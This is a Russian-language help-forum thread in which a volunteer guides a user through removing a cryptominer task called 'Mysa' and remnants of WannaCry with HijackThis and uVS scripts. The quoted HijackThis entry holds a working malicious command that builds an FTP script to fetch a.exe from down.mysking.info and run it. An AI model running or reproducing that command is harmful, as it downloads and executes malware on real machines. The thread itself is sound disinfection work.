Mysa и нагрузка системы

[Katerina Rusenko]

Здравствуйте. Сегодня решили проверить  планировщик заданий, а там сидит Mysa. Первый раз видим такое, погуглили, вирус. Очень часто пропадает интернет, улетает много траффика, компьютер бывает очень жутко шумит и не всегда включается, причем (как мне сказали, вирус кушает много электроэнергии, напрягая видеокарту и процы) моя розетка стала брахлить даже))). незнаю, может это и не с этим связано, но телефон терь заряжается из неё как с юсб. Загрузка цп варьируется до 90% только лишь при открытом браузере. хотя нам и не мешало это особо, но теперь очень много непониманий. файлы прилагаю после скана логов. Очень ждем от вас помощи.

CollectionLog-2017.11.12-17.11.zip

[regist]

"Пофиксите" в HijackThis:

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe

 

1. Скачайте Universal Virus Sniffer (uVS)
2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
   
   !!!Внимание.
   Если у вас установлены архиваторы
   WinRAR
   или
   7-Zip
   , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
   
   !!! Обратите внимание
   , что утилиты необходимо запускать от имени Администратора. По умолчанию в
   Windows XP
   так и есть. В
   Windows Vista
   и
   Windows 7
   администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
   Запуск от имени Администратора
   , при необходимости укажите пароль администратора и нажмите
   "Да"
   .

   
   

Подробнее читайте в руководстве Как подготовить лог UVS.
 

[Katerina Rusenko]

"Пофиксите" в HijackThis:

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe

• Скачайте Universal Virus Sniffer (uVS)
• Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
• Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

  !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

• Дождитесь окончания работы программы и прикрепите лог к посту в теме.

  !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

Подробнее читайте в руководстве Как подготовить лог UVS.

 

https://ru.files.fm/u/bdgxwg2w

 

размер больше загружаемого, закинул на файлообменник

[regist]

Не надо заниматься оверковтингом, внизу есть поле для быстрого ответа.

 

 

размер больше загружаемого, закинул на файлообменник

можно было просто заархивировать

 

 

!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

выполните скрипт в uVS

;uVS v4.0.10 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
delref WMI_.[FUCKYOUMM2_FILTER]
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref F:\MINSTALL\MINST.EXE
delref F:\AUTORUN.EXE
apply

restart

что с проблемой?

[Katerina Rusenko]

 

ну мы сделали скрипт, перезагрузился. мусы нет в планировщике. но её еще вчера после перезагрузки не было , после фикса хайджек пропал из планировщика. а как проверить, что его точно нет? загрузка цп как и была 3-40%

Изменено 13 ноября, 2017 пользователем Katerina Rusenko

[regist]

Скачайте эту утилиту. Распакуйте и запустите.

Можете не дожидаться окончания сканирования, соберите новый лог uVS таким образом.

 

1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
   

   ;uVS v4.0.5 [http://dsrt.dyndns.org]
   v400c
   
   adddir %SystemRoot%\
   crimg

4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
6. После этого в папке с программой будет создан образ автозапуска название, которого имеет формат "имя_компьютера_дата_сканирования". Прикрепите этот образ к следующему сообщению
   
   !!! Обратите внимание
   , что утилиты необходимо запускать от имени Администратора. По умолчанию в
   Windows XP
   так и есть. В
   Windows Vista
   и
   Windows 7
   администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
   Запуск от имени Администратора
   , при необходимости укажите пароль администратора и нажмите
   "Да"
   .

   
   

 

ЗЫ. не забудьте, потом заархивировать файл чтобы выложить на форум, если его uVS сам не заархивирует.
 

[Katerina Rusenko]

запустили утилиту(она не зип) сразу экзешка. минут 25 сканила, так и не закончила, сразу после запуска её запустили сбор логов, все как написано, отключили брандмаузер и антивирус. стал собирать лог и на той же 25 минуте 404 синий экран. перезагрузка(молился чтоб винда не слетела) все что успел прочитать, что при сборе логов внизу много файлов не может найти

[regist]

Попробуйте ещё раз, если вдруг вылетит, то из безопасного режима.

 

 

перезагрузка(молился чтоб винда не слетела)

Это просто сбор информации, ничего не удаляет и не меняет. Так что винда из-за этого не слетит.

[Katerina Rusenko]

еще вопрос, интернет же включенный должен быть для утилиты?

что из этого нужно выложить?

[regist]

еще вопрос, интернет же включенный должен быть для утилиты?

для AutorunsVTchecker обязательно, для остальных нет. Хотя для uVS может понадобиться при проверке цифровых подписей (если полезет запрашивать информацию по сертификату).

 

 

 

что из этого нужно выложить?

тот который свежее, то есть 2017-11-13_11-23-46-log только

 

 

не забудьте заархивировать файл чтобы выложить на форум

[Katerina Rusenko]

держите

2017-11-13_11-23-46_log.zip

[regist]

Извиняюсь, не тот файл сказал прикрепить

 

что из этого нужно выложить?

на скрине вообще не видно нужного файла.

Нужный файл должен называться USER-PC_2017-11-13_10-55-43.TXT

+ посмотрите, у вас такой файл есть?

D:\11\SNUFF\UVS\pack\7za.exe

[Katerina Rusenko]

он превышает в зипе даже. как разделить?) может на зеркало зип?

https://ru.files.fm/u/nnpdnpq6#_

 

извините за зеркалку. с телефоном не очень тут

[regist]

Скрипт попозже дам, а пока

 

Поставьте обновление http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212
И в будущем не забывайте своевременно обновляться.

Вчера или позавчера вы ещё успели шифровальщика WannaCry подхватить. Надеюсь он ничего не успел зашифровать.

+ обновите базы касперского и выполните проверку хотя бы диска C:\

[regist]

1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
   

   ;uVS v4.0.10 [http://dsrt.dyndns.org]
   ;Target OS: NTv6.1
   v400c
   BREG
   zoo %SystemRoot%\TASKSCHE.EXE
   bl 7F7CCAA16FB15EB1C7399D422F8363E8 3514368
   addsgn A7679BF0AA02C4A64BD4C64512881261848AFCF689AA7BF1A0C3C5BC50559D24704194DE5BBDAE92A2DD78F544E95C3EFC9FE82BD6D7FCD56D775BACCA56DB33 8 Trojan-Ransom.Win32.Wanna [Kaspersky] 7
   
   zoo %SystemRoot%\QERIUWJHRF
   chklst
   delvir
   
   czoo
   restart

4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
   
   Если архив отсутствует, то
   заархивруйте папку ZOO
   с паролем
   virus
   .

7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

+ сделайте свежие логи по правилам (Автологером).